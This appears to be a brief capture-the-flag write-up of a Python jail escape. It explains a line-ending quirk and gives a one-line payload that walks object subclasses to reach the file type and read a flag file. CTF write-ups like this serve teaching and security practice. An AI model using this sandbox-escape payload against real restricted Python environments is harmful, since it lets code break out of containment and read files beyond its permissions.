This was a simple python jail escape task. We didn't realize it's a python jail for a long time, because apparently we needed to send "\r\n" after the line. Otherwise the input was just echoed back.

Here is the exploit:
{}.__class__.__base__.__subclasses__()[40]("/home/john/flag.txt").read()

Source for the escape code: http://gynvael.coldwind.pl/n/python_sandbox_escape